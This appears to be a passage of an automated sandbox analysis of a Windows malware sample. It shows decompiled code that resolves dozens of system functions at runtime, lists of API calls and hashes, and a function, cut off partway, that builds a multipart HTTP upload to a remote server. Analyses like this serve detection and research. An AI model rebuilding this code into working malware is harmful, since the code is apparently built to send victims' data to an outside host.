					 *0x4179fc = GetProcAddress(_t95, _t334);
					_t249 =  *0x417638; // 0xbb2e00
					_t335 =  *0x417a70; // 0x745c0000
					 *0x417a6c = GetProcAddress(_t335, _t249);
					_t98 =  *0x417294; // 0xbb9730
					_t250 =  *0x417a70; // 0x745c0000
					 *0x417a7c = GetProcAddress(_t250, _t98);
					_t336 =  *0x417608; // 0xbb9850
					_t100 =  *0x417a70; // 0x745c0000
					 *0x417864 = GetProcAddress(_t100, _t336);
					_t251 =  *0x417380; // 0xbb4f90
					_t337 =  *0x417a70; // 0x745c0000
					 *0x417a84 = GetProcAddress(_t337, _t251);
					_t103 =  *0x4174e4; // 0xbb5050
					_t252 =  *0x417a70; // 0x745c0000
					 *0x417a28 = GetProcAddress(_t252, _t103);
					_t338 =  *0x417388; // 0xbb5260
					_t105 =  *0x417a70; // 0x745c0000
					_t16 = GetProcAddress(_t105, _t338);
					 *0x417a5c = _t16;
				}
				if( *0x417844 != 0) {
					_t242 =  *0x4176b8; // 0xbb5248
					_t329 =  *0x417844; // 0x73ae0000
					 *0x41791c = GetProcAddress(_t329, _t242);
					_t82 =  *0x417534; // 0xbb9930
					_t243 =  *0x417844; // 0x73ae0000
					 *0x4178fc = GetProcAddress(_t243, _t82);
					_t330 =  *0x417180; // 0xbb5278
					_t84 =  *0x417844; // 0x73ae0000
					 *0x417998 = GetProcAddress(_t84, _t330);
					_t244 =  *0x417714; // 0xbb9750
					_t331 =  *0x417844; // 0x73ae0000
					 *0x41785c = GetProcAddress(_t331, _t244);
					_t87 =  *0x4171fc; // 0xbb51b8
					_t245 =  *0x417844; // 0x73ae0000
					_t16 = GetProcAddress(_t245, _t87);
					 *0x417a38 = _t16;
				}
				if( *0x417964 != 0) {
					_t319 =  *0x4174bc; // 0xbb5218
					_t59 =  *0x417964; // 0x76990000
					 *0x4179a4 = GetProcAddress(_t59, _t319);
					_t233 =  *0x417198; // 0xbb51d0
					_t320 =  *0x417964; // 0x76990000
					 *0x41793c = GetProcAddress(_t320, _t233);
					_t62 =  *0x417798; // 0xbb9890
					_t234 =  *0x417964; // 0x76990000
					 *0x417924 = GetProcAddress(_t234, _t62);
					_t321 =  *0x417270; // 0xbb9a70
					_t64 =  *0x417964; // 0x76990000
					 *0x4178a4 = GetProcAddress(_t64, _t321);
					_t235 =  *0x417614; // 0xbb51e8
					_t322 =  *0x417964; // 0x76990000
					 *0x417884 = GetProcAddress(_t322, _t235);
					_t67 =  *0x4172b4; // 0xbb2e10
					_t236 =  *0x417964; // 0x76990000
					 *0x41786c = GetProcAddress(_t236, _t67);
					_t323 =  *0x4175e0; // 0xbb5200
					_t69 =  *0x417964; // 0x76990000
					 *0x417a0c = GetProcAddress(_t69, _t323);
					_t237 =  *0x41719c; // 0xbb5230
					_t324 =  *0x417964; // 0x76990000
					 *0x417918 = GetProcAddress(_t324, _t237);
					_t72 =  *0x41772c; // 0xbbbcd8
					_t238 =  *0x417964; // 0x76990000
					 *0x4179c4 = GetProcAddress(_t238, _t72);
					_t325 =  *0x417250; // 0xbbbc18
					_t74 =  *0x417964; // 0x76990000
					 *0x4178f4 = GetProcAddress(_t74, _t325);
					_t239 =  *0x417400; // 0xbb2cc0
					_t326 =  *0x417964; // 0x76990000
					 *0x417868 = GetProcAddress(_t326, _t239);
					_t77 =  *0x41717c; // 0xbb97b0
					_t240 =  *0x417964; // 0x76990000
					 *0x41797c = GetProcAddress(_t240, _t77);
					_t327 =  *0x417154; // 0xbbbdc8
					_t79 =  *0x417964; // 0x76990000
					 *0x4178bc = GetProcAddress(_t79, _t327);
					_t241 =  *0x417768; // 0xbbbb58
					_t328 =  *0x417964; // 0x76990000
					_t16 = GetProcAddress(_t328, _t241);
					 *0x4179cc = _t16;
				}
				if( *0x417a14 != 0) {
					_t58 =  *0x417120; // 0xba5790
					_t232 =  *0x417a14; // 0x6ec20000
					_t16 = GetProcAddress(_t232, _t58); // executed
					 *0x417850 = _t16;
				}
				if( *0x417928 != 0) {
					_t318 =  *0x41739c; // 0xbb98d0
					_t57 =  *0x417928; // 0x76600000
					_t16 = GetProcAddress(_t57, _t318);
					 *0x417a1c = _t16;
				}
				if( *0x417910 != 0) {
					_t231 =  *0x417350; // 0xbb97f0
					_t317 =  *0x417910; // 0x76ae0000
					_t16 = GetProcAddress(_t317, _t231);
					 *0x4178f8 = _t16;
				}
				if( *0x417a08 != 0) {
					_t48 =  *0x417108; // 0xbae7c8
					_t227 =  *0x417a08; // 0x73870000
					 *0x417938 = GetProcAddress(_t227, _t48);
					_t313 =  *0x417700; // 0xbb9770
					_t50 =  *0x417a08; // 0x73870000
					 *0x4179ec = GetProcAddress(_t50, _t313);
					_t228 =  *0x417508; // 0xbae6d8
					_t314 =  *0x417a08; // 0x73870000
					 *0x4178dc = GetProcAddress(_t314, _t228);
					_t53 =  *0x417358; // 0xbb98f0
					_t229 =  *0x417a08; // 0x73870000
					 *0x4178c8 = GetProcAddress(_t229, _t53);
					_t315 =  *0x41751c; // 0xbae700
					_t55 =  *0x417a08; // 0x73870000
					 *0x4178a8 = GetProcAddress(_t55, _t315);
					_t230 =  *0x4170a0; // 0xbbbcc0
					_t316 =  *0x417a08; // 0x73870000
					_t16 = GetProcAddress(_t316, _t230);
					 *0x417a2c = _t16;
				}
				if( *0x417a4c != 0) {
					_t39 =  *0x4172f8; // 0xbbbbb8
					_t223 =  *0x417a4c; // 0x6eca0000
					 *0x41799c = GetProcAddress(_t223, _t39);
					_t309 =  *0x417500; // 0xbbbc30
					_t41 =  *0x417a4c; // 0x6eca0000
					 *0x417900 = GetProcAddress(_t41, _t309);
					_t224 =  *0x417538; // 0xbb99b0
					_t310 =  *0x417a4c; // 0x6eca0000
					 *0x417a04 = GetProcAddress(_t310, _t224);
					_t44 =  *0x417214; // 0xbb9810
					_t225 =  *0x417a4c; // 0x6eca0000
					 *0x417874 = GetProcAddress(_t225, _t44);
					_t311 =  *0x417784; // 0xbb99d0
					_t46 =  *0x417a4c; // 0x6eca0000
					 *0x417970 = GetProcAddress(_t46, _t311);
					_t226 =  *0x4177c0; // 0xbbbb88
					_t312 =  *0x417a4c; // 0x6eca0000
					_t16 = GetProcAddress(_t312, _t226);
					 *0x4179dc = _t16;
				}
				if( *0x417944 != 0) {
					_t35 =  *0x417178; // 0xbbbb70
					_t221 =  *0x417944; // 0x76550000
					 *0x417a20 = GetProcAddress(_t221, _t35);
					_t307 =  *0x41768c; // 0xbb2dc0
					_t37 =  *0x417944; // 0x76550000
					 *0x417888 = GetProcAddress(_t37, _t307);
					_t222 =  *0x4170e4; // 0xbbbbe8
					_t308 =  *0x417944; // 0x76550000
					_t16 = GetProcAddress(_t308, _t222);
					 *0x4178e8 = _t16;
				}
				if( *0x417a60 != 0) {
					_t32 =  *0x41726c; // 0xbb9a50
					_t220 =  *0x417a60; // 0x750f0000
					 *0x4179d4 = GetProcAddress(_t220, _t32);
					_t306 =  *0x417374; // 0xbbbd20
					_t34 =  *0x417a60; // 0x750f0000
					_t16 = GetProcAddress(_t34, _t306);
					 *0x417a50 = _t16;
				}
				if( *0x417914 != 0) {
					_t214 =  *0x4173c8; // 0xbae750
					_t301 =  *0x417914; // 0x73130000
					 *0x4178c4 = GetProcAddress(_t301, _t214);
					_t21 =  *0x41729c; // 0xbb9990
					_t215 =  *0x417914; // 0x73130000
					 *0x417904 = GetProcAddress(_t215, _t21);
					_t302 =  *0x417304; // 0xbae570
					_t23 =  *0x417914; // 0x73130000
					 *0x4179bc = GetProcAddress(_t23, _t302);
					_t216 =  *0x417150; // 0xbbbca8
					_t303 =  *0x417914; // 0x73130000
					 *0x417a00 = GetProcAddress(_t303, _t216);
					_t26 =  *0x4174ec; // 0xbbbc00
					_t217 =  *0x417914; // 0x73130000
					 *0x4179e0 = GetProcAddress(_t217, _t26);
					_t304 =  *0x4177b8; // 0xbb9790
					_t28 =  *0x417914; // 0x73130000
					 *0x41798c = GetProcAddress(_t28, _t304);
					_t218 =  *0x41737c; // 0xbb9950
					_t305 =  *0x417914; // 0x73130000
					 *0x4178d0 = GetProcAddress(_t305, _t218);
					_t31 =  *0x4177a8; // 0xbbbbd0
					_t219 =  *0x417914; // 0x73130000
					_t16 = GetProcAddress(_t219, _t31);
					 *0x417a48 = _t16;
				}
				if( *0x417958 != 0) {
					_t299 =  *0x417174; // 0xbb99f0
					_t17 =  *0x417958; // 0x76610000
					 *0x417968 = GetProcAddress(_t17, _t299);
					_t213 =  *0x4173d4; // 0xbb9570
					_t300 =  *0x417958; // 0x76610000
					_t19 = GetProcAddress(_t300, _t213);
					 *0x417870 = _t19;
					return _t19;
				}
				return _t16;
			}

0x0040b0ba
0x0040b0c0
0x0040b0c6
0x0040b0d3
0x0040b0d8
0x0040b0df
0x0040b0eb
0x0040b0f0
0x0040b0f7
0x0040b104
0x0040b109
0x0040b10f
0x0040b11c
0x0040b121
0x0040b128
0x0040b134
0x0040b139
0x0040b140
0x0040b14d
0x0040b152
0x0040b158
0x0040b165
0x0040b16a
0x0040b171
0x0040b17d
0x0040b182
0x0040b189
0x0040b196
0x0040b19b
0x0040b1a1
0x0040b1ae
0x0040b1b3
0x0040b1ba
0x0040b1c6
0x0040b1cb
0x0040b1d2
0x0040b1df
0x0040b1e4
0x0040b1ea
0x0040b1f7
0x0040b1fc
0x0040b203
0x0040b20f
0x0040b214
0x0040b21b
0x0040b228
0x0040b22d
0x0040b233
0x0040b240
0x0040b245
0x0040b24c
0x0040b258
0x0040b25d
0x0040b264
0x0040b271
0x0040b276
0x0040b27c
0x0040b289
0x0040b28e
0x0040b295
0x0040b2a1
0x0040b2a6
0x0040b2ad
0x0040b2ba
0x0040b2bf
0x0040b2c5
0x0040b2d2
0x0040b2d7
0x0040b2de
0x0040b2ea
0x0040b2ef
0x0040b2f6
0x0040b303
0x0040b308
0x0040b30e
0x0040b31b
0x0040b320
0x0040b327
0x0040b333
0x0040b338
0x0040b33f
0x0040b34c
0x0040b351
0x0040b357
0x0040b364
0x0040b369
0x0040b370
0x0040b37c
0x0040b381
0x0040b388
0x0040b395
0x0040b39a
0x0040b3a0
0x0040b3ad
0x0040b3b2
0x0040b3b9
0x0040b3c5
0x0040b3ca
0x0040b3d1
0x0040b3de
0x0040b3e3
0x0040b3e9
0x0040b3f6
0x0040b3fb
0x0040b402
0x0040b40e
0x0040b413
0x0040b41a
0x0040b427
0x0040b42c
0x0040b432
0x0040b43f
0x0040b444
0x0040b44b
0x0040b457
0x0040b45c
0x0040b463
0x0040b470
0x0040b475
0x0040b47b
0x0040b488
0x0040b48d
0x0040b494
0x0040b4a0
0x0040b4a5
0x0040b4ac
0x0040b4b9
0x0040b4be
0x0040b4c4
0x0040b4d1
0x0040b4d6
0x0040b4dd
0x0040b4e9
0x0040b4ee
0x0040b4f5
0x0040b502
0x0040b507
0x0040b50d
0x0040b51a
0x0040b51f
0x0040b526
0x0040b532
0x0040b537
0x0040b53e
0x0040b54b
0x0040b550
0x0040b556
0x0040b563
0x0040b568
0x0040b56f
0x0040b57b
0x0040b580
0x0040b587
0x0040b594
0x0040b599
0x0040b59f
0x0040b5ac
0x0040b5b1
0x0040b5b8
0x0040b5c4
0x0040b5c4
0x0040b5c9
0x0040b5d6
0x0040b5db
0x0040b5e2
0x0040b5e8
0x0040b5ed
0x0040b5f3
0x0040b5f9
0x0040b5fe
0x0040b60b
0x0040b610
0x0040b617
0x0040b61d
0x0040b622
0x0040b628
0x0040b62e
0x0040b633
0x0040b63a
0x0040b640
0x0040b645
0x0040b64c
0x0040b652
0x0040b657
0x0040b65d
0x0040b663
0x0040b668
0x0040b66f
0x0040b675
0x0040b67a
0x0040b681
0x0040b687
0x0040b68c
0x0040b692
0x0040b698
0x0040b6a4
0x0040b6a6
0x0040b6ad
0x0040b6b4
0x0040b6ba
0x0040b6ba
0x0040b6c6
0x0040b6cc
0x0040b6d2
0x0040b6df
0x0040b6e4
0x0040b6eb
0x0040b6f7
0x0040b6fc
0x0040b703
0x0040b710
0x0040b715
0x0040b71b
0x0040b728
0x0040b72d
0x0040b734
0x0040b740
0x0040b745
0x0040b74c
0x0040b759
0x0040b75e
0x0040b764
0x0040b771
0x0040b776
0x0040b77d
0x0040b789
0x0040b78e
0x0040b795
0x0040b79c
0x0040b7a2
0x0040b7a2
0x0040b7ae
0x0040b7b4
0x0040b7ba
0x0040b7c7
0x0040b7cc
0x0040b7d3
0x0040b7df
0x0040b7e4
0x0040b7eb
0x0040b7f8
0x0040b7fd
0x0040b803
0x0040b810
0x0040b815
0x0040b81c
0x0040b828
0x0040b82d
0x0040b834
0x0040b841
0x0040b846
0x0040b84c
0x0040b859
0x0040b85e
0x0040b865
0x0040b871
0x0040b876
0x0040b87d
0x0040b88a
0x0040b88f
0x0040b895
0x0040b8a2
0x0040b8a7
0x0040b8ae
0x0040b8b4
0x0040b8ba
0x0040b8ba
0x0040b8c6
0x0040b8c8
0x0040b8cf
0x0040b8dc
0x0040b8e1
0x0040b8e7
0x0040b8f4
0x0040b8f9
0x0040b900
0x0040b90c
0x0040b911
0x0040b918
0x0040b925
0x0040b92a
0x0040b930
0x0040b937
0x0040b93d
0x0040b93d
0x0040b949
0x0040b94f
0x0040b956
0x0040b962
0x0040b967
0x0040b96e
0x0040b97b
0x0040b980
0x0040b986
0x0040b993
0x0040b998
0x0040b99f
0x0040b9ab
0x0040b9b0
0x0040b9b7
0x0040b9c4
0x0040b9c9
0x0040b9cf
0x0040b9dc
0x0040b9e1
0x0040b9e8
0x0040b9f4
0x0040b9f9
0x0040ba00
0x0040ba0d
0x0040ba12
0x0040ba18
0x0040ba25
0x0040ba2a
0x0040ba31
0x0040ba3d
0x0040ba42
0x0040ba49
0x0040ba56
0x0040ba5b
0x0040ba61
0x0040ba6e
0x0040ba73
0x0040ba7a
0x0040ba86
0x0040ba8b
0x0040ba92
0x0040ba99
0x0040ba9f
0x0040ba9f
0x0040baab
0x0040baad
0x0040bab3
0x0040baba
0x0040bac0
0x0040bac0
0x0040bacc
0x0040bace
0x0040bad5
0x0040badb
0x0040bae1
0x0040bae1
0x0040baed
0x0040baef
0x0040baf6
0x0040bafd
0x0040bb03
0x0040bb03
0x0040bb0f
0x0040bb15
0x0040bb1b
0x0040bb28
0x0040bb2d
0x0040bb34
0x0040bb40
0x0040bb45
0x0040bb4c
0x0040bb59
0x0040bb5e
0x0040bb64
0x0040bb71
0x0040bb76
0x0040bb7d
0x0040bb89
0x0040bb8e
0x0040bb95
0x0040bb9c
0x0040bba2
0x0040bba2
0x0040bbae
0x0040bbb4
0x0040bbba
0x0040bbc7
0x0040bbcc
0x0040bbd3
0x0040bbdf
0x0040bbe4
0x0040bbeb
0x0040bbf8
0x0040bbfd
0x0040bc03
0x0040bc10
0x0040bc15
0x0040bc1c
0x0040bc28
0x0040bc2d
0x0040bc34
0x0040bc3b
0x0040bc41
0x0040bc41
0x0040bc4d
0x0040bc4f
0x0040bc55
0x0040bc62
0x0040bc67
0x0040bc6e
0x0040bc7a
0x0040bc7f
0x0040bc86
0x0040bc8d
0x0040bc93
0x0040bc93
0x0040bc9f
0x0040bca1
0x0040bca7
0x0040bcb4
0x0040bcb9
0x0040bcc0
0x0040bcc6
0x0040bccc
0x0040bccc
0x0040bcd8
0x0040bcde
0x0040bce5
0x0040bcf2
0x0040bcf7
0x0040bcfd
0x0040bd0a
0x0040bd0f
0x0040bd16
0x0040bd22
0x0040bd27
0x0040bd2e
0x0040bd3b
0x0040bd40
0x0040bd46
0x0040bd53
0x0040bd58
0x0040bd5f
0x0040bd6b
0x0040bd70
0x0040bd77
0x0040bd84
0x0040bd89
0x0040bd8f
0x0040bd96
0x0040bd9c
0x0040bd9c
0x0040bda8
0x0040bdaa
0x0040bdb1
0x0040bdbd
0x0040bdc2
0x0040bdc9
0x0040bdd0
0x0040bdd6
0x00000000
0x0040bdd6
0x0040bddc

APIs

GetProcAddress.KERNEL32(73B60000,00BB0940), ref: 0040B0CD
GetProcAddress.KERNEL32(73B60000,00BB0AD8), ref: 0040B0E5
GetProcAddress.KERNEL32(73B60000,00BAE438), ref: 0040B0FE
GetProcAddress.KERNEL32(73B60000,00BB0BF8), ref: 0040B116
GetProcAddress.KERNEL32(73B60000,00BB0BB0), ref: 0040B12E
GetProcAddress.KERNEL32(73B60000,00BB0BC8), ref: 0040B147
GetProcAddress.KERNEL32(73B60000,00BB0C58), ref: 0040B15F
GetProcAddress.KERNEL32(73B60000,00BB0B98), ref: 0040B177
GetProcAddress.KERNEL32(73B60000,00BB0C10), ref: 0040B190
GetProcAddress.KERNEL32(73B60000,00BB0C40), ref: 0040B1A8
GetProcAddress.KERNEL32(73B60000,00BB50F8), ref: 0040B1C0
GetProcAddress.KERNEL32(73B60000,00BB50E0), ref: 0040B1D9
GetProcAddress.KERNEL32(73B60000,00BB5098), ref: 0040B1F1
GetProcAddress.KERNEL32(73B60000,00BB5068), ref: 0040B209
GetProcAddress.KERNEL32(73B60000,00BAE178), ref: 0040B222
GetProcAddress.KERNEL32(73B60000,00BB5080), ref: 0040B23A
GetProcAddress.KERNEL32(73B60000,00BAE118), ref: 0040B252
GetProcAddress.KERNEL32(73B60000,00BAE548), ref: 0040B26B
GetProcAddress.KERNEL32(73B60000,00BB4FF0), ref: 0040B283
GetProcAddress.KERNEL32(73B60000,00BAE278), ref: 0040B29B
GetProcAddress.KERNEL32(73B60000,00BB5008), ref: 0040B2B4
GetProcAddress.KERNEL32(73B60000,00BAE078), ref: 0040B2CC
GetProcAddress.KERNEL32(73B60000,00BAE098), ref: 0040B2E4
GetProcAddress.KERNEL32(73B60000,00BB5038), ref: 0040B2FD
GetProcAddress.KERNEL32(73B60000,00BB4EE8), ref: 0040B315
GetProcAddress.KERNEL32(73B60000,00BB4ED0), ref: 0040B32D
GetProcAddress.KERNEL32(73B60000,00BB4F30), ref: 0040B346
GetProcAddress.KERNEL32(73B60000,00BAE0B8), ref: 0040B35E
GetProcAddress.KERNEL32(73B60000,00BB5110), ref: 0040B376
GetProcAddress.KERNEL32(73B60000,00BB4FA8), ref: 0040B38F
GetProcAddress.KERNEL32(73B60000,00BB4FD8), ref: 0040B3A7
GetProcAddress.KERNEL32(73B60000,00BAE0D8), ref: 0040B3BF
GetProcAddress.KERNEL32(73B60000,00BB4F18), ref: 0040B3D8
GetProcAddress.KERNEL32(73B60000,00BB4F00), ref: 0040B3F0
GetProcAddress.KERNEL32(73B60000,00BB50B0), ref: 0040B408
GetProcAddress.KERNEL32(73B60000,00BB5188), ref: 0040B421
GetProcAddress.KERNEL32(73B60000,00BB51A0), ref: 0040B439
GetProcAddress.KERNEL32(73B60000,00BAE2F8), ref: 0040B451
GetProcAddress.KERNEL32(73B60000,00BAE198), ref: 0040B46A
GetProcAddress.KERNEL32(73B60000,00BB5020), ref: 0040B482
GetProcAddress.KERNEL32(73B60000,00BB5128), ref: 0040B49A
GetProcAddress.KERNEL32(73B60000,00BAE0F8), ref: 0040B4B3
GetProcAddress.KERNEL32(73B60000,00BAE480), ref: 0040B4CB
GetProcAddress.KERNEL32(73B60000,00BB50C8), ref: 0040B4E3
GetProcAddress.KERNEL32(73B60000,00BB5140), ref: 0040B4FC
GetProcAddress.KERNEL32(73B60000,00BAE318), ref: 0040B514
GetProcAddress.KERNEL32(73B60000,00BAE338), ref: 0040B52C
GetProcAddress.KERNEL32(73B60000,00BAE138), ref: 0040B545
GetProcAddress.KERNEL32(73B60000,00BB5158), ref: 0040B55D
GetProcAddress.KERNEL32(73B60000,00BAE1B8), ref: 0040B575
GetProcAddress.KERNEL32(73B60000,00BB5170), ref: 0040B58E
GetProcAddress.KERNEL32(73B60000,00BB97D0), ref: 0040B5A6
GetProcAddress.KERNEL32(73B60000,00BB9870), ref: 0040B5BE
LoadLibraryA.KERNEL32(00BB08F8,?,0040582B), ref: 0040B5D0
LoadLibraryA.KERNEL32(00BB08B0,?,0040582B), ref: 0040B5E2
LoadLibraryA.KERNEL32(00BB0B08,?,0040582B), ref: 0040B5F3
LoadLibraryA.KERNEL32(00BB09A0,?,0040582B), ref: 0040B605
LoadLibraryA.KERNEL32(00BB08C8,?,0040582B), ref: 0040B617
LoadLibraryA.KERNEL32(00BB0AA8,?,0040582B), ref: 0040B628
LoadLibraryA.KERNEL32(00BB09B8,?,0040582B), ref: 0040B63A
LoadLibraryA.KERNEL32(00BB0A78,?,0040582B), ref: 0040B64C
LoadLibraryA.KERNEL32(00BB0A90,?,0040582B), ref: 0040B65D
LoadLibraryA.KERNEL32(00BB0AC0,?,0040582B), ref: 0040B66F
LoadLibraryA.KERNEL32(00BB0C28,?,0040582B), ref: 0040B681
LoadLibraryA.KERNEL32(00BB0BE0,?,0040582B), ref: 0040B692
GetProcAddress.KERNEL32(770B0000,00BB2DB0), ref: 0040B6B4
GetProcAddress.KERNEL32(6F710000,00BB4F48), ref: 0040B6D9
GetProcAddress.KERNEL32(6F710000,00BB96D0), ref: 0040B6F1
GetProcAddress.KERNEL32(6F710000,00BB9A10), ref: 0040B70A
GetProcAddress.KERNEL32(6F710000,00BB9830), ref: 0040B722
GetProcAddress.KERNEL32(6F710000,00BB4EB8), ref: 0040B73A
GetProcAddress.KERNEL32(6F710000,00BB9A30), ref: 0040B753
GetProcAddress.KERNEL32(6F710000,00BB98B0), ref: 0040B76B
GetProcAddress.KERNEL32(6F710000,00BB96F0), ref: 0040B783
GetProcAddress.KERNEL32(6F710000,00BB9910), ref: 0040B79C
GetProcAddress.KERNEL32(745C0000,00BB4F60), ref: 0040B7C1
GetProcAddress.KERNEL32(745C0000,00BB4F78), ref: 0040B7D9
GetProcAddress.KERNEL32(745C0000,00BB9710), ref: 0040B7F2
GetProcAddress.KERNEL32(745C0000,00BB9970), ref: 0040B80A
GetProcAddress.KERNEL32(745C0000,00BB4FC0), ref: 0040B822
GetProcAddress.KERNEL32(745C0000,00BB2E00), ref: 0040B83B
GetProcAddress.KERNEL32(745C0000,00BB9730), ref: 0040B853
GetProcAddress.KERNEL32(745C0000,00BB9850), ref: 0040B86B
GetProcAddress.KERNEL32(745C0000,00BB4F90), ref: 0040B884
GetProcAddress.KERNEL32(745C0000,00BB5050), ref: 0040B89C
GetProcAddress.KERNEL32(745C0000,00BB5260), ref: 0040B8B4
GetProcAddress.KERNEL32(73AE0000,00BB5248), ref: 0040B8D6
GetProcAddress.KERNEL32(73AE0000,00BB9930), ref: 0040B8EE
GetProcAddress.KERNEL32(73AE0000,00BB5278), ref: 0040B906
GetProcAddress.KERNEL32(73AE0000,00BB9750), ref: 0040B91F
GetProcAddress.KERNEL32(73AE0000,00BB51B8), ref: 0040B937
GetProcAddress.KERNEL32(76990000,00BB5218), ref: 0040B95C
GetProcAddress.KERNEL32(76990000,00BB51D0), ref: 0040B975
GetProcAddress.KERNEL32(76990000,00BB9890), ref: 0040B98D
GetProcAddress.KERNEL32(76990000,00BB9A70), ref: 0040B9A5
GetProcAddress.KERNEL32(76990000,00BB51E8), ref: 0040B9BE
GetProcAddress.KERNEL32(76990000,00BB2E10), ref: 0040B9D6
GetProcAddress.KERNEL32(76990000,00BB5200), ref: 0040B9EE
GetProcAddress.KERNEL32(76990000,00BB5230), ref: 0040BA07
GetProcAddress.KERNEL32(76990000,00BBBCD8), ref: 0040BA1F
GetProcAddress.KERNEL32(76990000,00BBBC18), ref: 0040BA37
GetProcAddress.KERNEL32(76990000,00BB2CC0), ref: 0040BA50
GetProcAddress.KERNEL32(76990000,00BB97B0), ref: 0040BA68
GetProcAddress.KERNEL32(76990000,00BBBDC8), ref: 0040BA80
GetProcAddress.KERNEL32(76990000,00BBBB58), ref: 0040BA99
GetProcAddress.KERNEL32(6EC20000,00BA5790), ref: 0040BABA
GetProcAddress.KERNEL32(76600000,00BB98D0), ref: 0040BADB
GetProcAddress.KERNEL32(76AE0000,00BB97F0), ref: 0040BAFD
GetProcAddress.KERNEL32(73870000,00BAE7C8), ref: 0040BB22
GetProcAddress.KERNEL32(73870000,00BB9770), ref: 0040BB3A
GetProcAddress.KERNEL32(73870000,00BAE6D8), ref: 0040BB53
GetProcAddress.KERNEL32(73870000,00BB98F0), ref: 0040BB6B
GetProcAddress.KERNEL32(73870000,00BAE700), ref: 0040BB83
GetProcAddress.KERNEL32(73870000,00BBBCC0), ref: 0040BB9C
GetProcAddress.KERNEL32(6ECA0000,00BBBBB8), ref: 0040BBC1
GetProcAddress.KERNEL32(6ECA0000,00BBBC30), ref: 0040BBD9
GetProcAddress.KERNEL32(6ECA0000,00BB99B0), ref: 0040BBF2
GetProcAddress.KERNEL32(6ECA0000,00BB9810), ref: 0040BC0A
GetProcAddress.KERNEL32(6ECA0000,00BB99D0), ref: 0040BC22
GetProcAddress.KERNEL32(6ECA0000,00BBBB88), ref: 0040BC3B
GetProcAddress.KERNEL32(76550000,00BBBB70), ref: 0040BC5C
GetProcAddress.KERNEL32(76550000,00BB2DC0), ref: 0040BC74
GetProcAddress.KERNEL32(76550000,00BBBBE8), ref: 0040BC8D
GetProcAddress.KERNEL32(750F0000,00BB9A50), ref: 0040BCAE
GetProcAddress.KERNEL32(750F0000,00BBBD20), ref: 0040BCC6
GetProcAddress.KERNEL32(73130000,00BAE750), ref: 0040BCEC
GetProcAddress.KERNEL32(73130000,00BB9990), ref: 0040BD04
GetProcAddress.KERNEL32(73130000,00BAE570), ref: 0040BD1C
GetProcAddress.KERNEL32(73130000,00BBBCA8), ref: 0040BD35
GetProcAddress.KERNEL32(73130000,00BBBC00), ref: 0040BD4D
GetProcAddress.KERNEL32(73130000,00BB9790), ref: 0040BD65
GetProcAddress.KERNEL32(73130000,00BB9950), ref: 0040BD7E
GetProcAddress.KERNEL32(73130000,00BBBBD0), ref: 0040BD96
GetProcAddress.KERNEL32(76610000,00BB99F0), ref: 0040BDB7
GetProcAddress.KERNEL32(76610000,00BB9570), ref: 0040BDD0

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 853c7a390b28759db1dd7fa54f6f9dc4db9eb1c73fba7eb64ae3d8f36452da03
Instruction ID: 6114d172cc60c1506327f9bd4500374205328ec3e081ed2de4e1cd545bfe7786
Opcode Fuzzy Hash: 853c7a390b28759db1dd7fa54f6f9dc4db9eb1c73fba7eb64ae3d8f36452da03
Instruction Fuzzy Hash: 9F828FB55A9240AFD344EFA8EE889E67BF9BB8D351300D53AA90AC3630D7349505CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00403E70, Relevance: 94.8, APIs: 50, Strings: 4, Instructions: 301
stringnetworkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00403E70(void* __ecx, void* __eflags, char* _a4, char* _a8, intOrPtr _a12, int _a16, intOrPtr _a20) {
				void _v8;
				char _v516;
				void* _v520;
				char _v1028;
				void* _v1032;
				void _v1548;
				int _v1552;
				long _v1556;
				char _v6556;
				void* _v6560;
				long _v6564;
				long _v6568;
				void* _v6572;
				intOrPtr _v6576;
				void _v8580;
				int _v8584;
				long _v8588;
				void* _t98;
				void* _t108;
				intOrPtr _t117;
				char* _t122;
				void* _t152;
				intOrPtr _t191;
				intOrPtr _t196;
				intOrPtr _t197;
				char* _t213;
				intOrPtr _t215;
				intOrPtr _t219;
				void* _t234;
				void* _t235;

				_t179 = __ecx;
				E00412560(0x2188, __ecx);
				E0040A230(_t179,  &_v6556, 0, 0x1388);
				E0040A270( &_v516, 0x1f4);
				_t98 = RtlAllocateHeap(GetProcessHeap(), 0, 0x800000); // executed
				_v1552 = _t98;
				E0040A270( &_v1028, 0x1f4);
				_v520 = InternetOpenA(0, 1, 0, 0, 0);
				_v8 = 0x927c0;
				_t181 = _v520;
				InternetSetOptionA(_v520, 2,  &_v8, 4);
				_t240 = _v520;
				if(_v520 != 0) {
					_t108 = E0040A400(_t181, _t240, 0x10);
					_t235 = _t235 + 4;
					 *0x4179f8( &_v516, _t108);
					 *0x4179f8(_v1552, "\r\n");
					 *0x4179f8(_v1552, "------");
					 *0x4179f8(_v1552,  &_v516);
					 *0x4179f8(_v1552, "--");
					 *0x4179f8(_v1552, "\r\n");
					_t117 =  *0x4171bc; // 0xba4b50
					 *0x4179f8( &_v1028, _t117);
					 *0x4179f8( &_v1028,  &_v516);
					_v6560 = InternetConnectA(_v520, _a4, 0x50, 0, 0, 3, 0, 0);
					if(_v6560 != 0) {
						_t122 =  *0x4172d4; // 0xbbbba0
						_t213 =  *0x417584; // 0xbb2dd0
						_v1032 = HttpOpenRequestA(_v6560, _t213, _a8, _t122, 0, 0, 0x400000, 0);
						if(_v1032 != 0) {
							 *0x4179f8( &_v1548, "------");
							 *0x4179f8( &_v1548,  &_v516);
							 *0x4179f8( &_v1548, "\r\n");
							_t215 =  *0x4172c8; // 0xba4b90
							 *0x4179f8( &_v1548, _t215);
							_t191 =  *0x417058; // 0xbb2cd0
							 *0x4179f8( &_v1548, _t191);
							 *0x4179f8( &_v1548, "\"\r\n\r\n");
							 *0x4179f8( &_v1548, _a12);
							 *0x4179f8( &_v1548, "\r\n");
							 *0x4179f8( &_v1548, "------");
							 *0x4179f8( &_v1548,  &_v516);
							 *0x4179f8( &_v1548, "\r\n");
							_t219 =  *0x417634; // 0xba4bc0
							 *0x4179f8( &_v1548, _t219);
							 *0x4179f8( &_v1548, _a12);
							 *0x4179f8( &_v1548, "\"\r\n");
							_t196 =  *0x417038; // 0xbbfec8
							 *0x4179f8( &_v1548, _t196);
							 *0x4179f8( &_v1548, "\r\n");
							_t197 =  *0x417530; // 0xbbffb0
							 *0x4179f8( &_v1548, _t197);
							 *0x4179f8( &_v1548, "\r\n\r\n");
							_t152 =  *0x4178e4( &_v1548);
